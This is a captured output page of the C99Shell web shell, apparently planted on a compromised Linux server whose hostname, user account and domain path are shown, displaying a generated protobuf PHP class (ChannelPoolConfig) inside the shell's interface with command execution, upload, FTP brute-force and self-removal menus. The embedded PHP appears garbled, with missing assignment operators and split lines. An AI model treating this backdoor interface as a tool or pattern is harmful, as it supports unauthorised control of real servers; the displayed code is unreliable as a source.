!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/qr.picotech.app/public_html/vendor/google/grpc-gcp/src/generated/Grpc/Gcp/   drwxr-xr-x
Free 25.82 GB of 117.98 GB (21.88%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ChannelPoolConfig.php (3.31 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# source: grpc_gcp.proto

namespace Grpc\Gcp;

use 
Google\Protobuf\Internal\GPBUtil;

/**
 * Generated from protobuf message <code>grpc.gcp.ChannelPoolConfig</code>
 */
class ChannelPoolConfig extends \Google\Protobuf\Internal\Message
{
    
/**
     * The max number of channels in the pool.
     *
     * Generated from protobuf field <code>uint32 max_size = 1;</code>
     */
    
private $max_size 0;
    
/**
     * The idle timeout (seconds) of channels without bound affinity sessions.
     *
     * Generated from protobuf field <code>uint64 idle_timeout = 2;</code>
     */
    
private $idle_timeout 0;
    
/**
     * The low watermark of max number of concurrent streams in a channel.
     * New channel will be created once it get hit, until we reach the max size
     * of the channel pool.
     *
     * Generated from protobuf field <code>uint32 max_concurrent_streams_low_watermark = 3;</code>
     */
    
private $max_concurrent_streams_low_watermark 0;

    public function 
__construct()
    {
        
\GPBMetadata\GrpcGcp::initOnce();
        
parent::__construct();
    }

    
/**
     * The max number of channels in the pool.
     *
     * Generated from protobuf field <code>uint32 max_size = 1;</code>
     * @return int
     */
    
public function getMaxSize()
    {
        return 
$this->max_size;
    }

    
/**
     * The max number of channels in the pool.
     *
     * Generated from protobuf field <code>uint32 max_size = 1;</code>
     * @param int $var
     * @return $this
     */
    
public function setMaxSize($var)
    {
        
GPBUtil::checkUint32($var);
        
$this->max_size $var;

        return 
$this;
    }

    
/**
     * The idle timeout (seconds) of channels without bound affinity sessions.
     *
     * Generated from protobuf field <code>uint64 idle_timeout = 2;</code>
     * @return int|string
     */
    
public function getIdleTimeout()
    {
        return 
$this->idle_timeout;
    }

    
/**
     * The idle timeout (seconds) of channels without bound affinity sessions.
     *
     * Generated from protobuf field <code>uint64 idle_timeout = 2;</code>
     * @param int|string $var
     * @return $this
     */
    
public function setIdleTimeout($var)
    {
        
GPBUtil::checkUint64($var);
        
$this->idle_timeout $var;

        return 
$this;
    }

    
/**
     * The low watermark of max number of concurrent streams in a channel.
     * New channel will be created once it get hit, until we reach the max size
     * of the channel pool.
     *
     * Generated from protobuf field <code>uint32 max_concurrent_streams_low_watermark = 3;</code>
     * @return int
     */
    
public function getMaxConcurrentStreamsLowWatermark()
    {
        return 
$this->max_concurrent_streams_low_watermark;
    }

    
/**
     * The low watermark of max number of concurrent streams in a channel.
     * New channel will be created once it get hit, until we reach the max size
     * of the channel pool.
     *
     * Generated from protobuf field <code>uint32 max_concurrent_streams_low_watermark = 3;</code>
     * @param int $var
     * @return $this
     */
    
public function setMaxConcurrentStreamsLowWatermark($var)
    {
        
GPBUtil::checkUint32($var);
        
$this->max_concurrent_streams_low_watermark $var;

        return 
$this;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--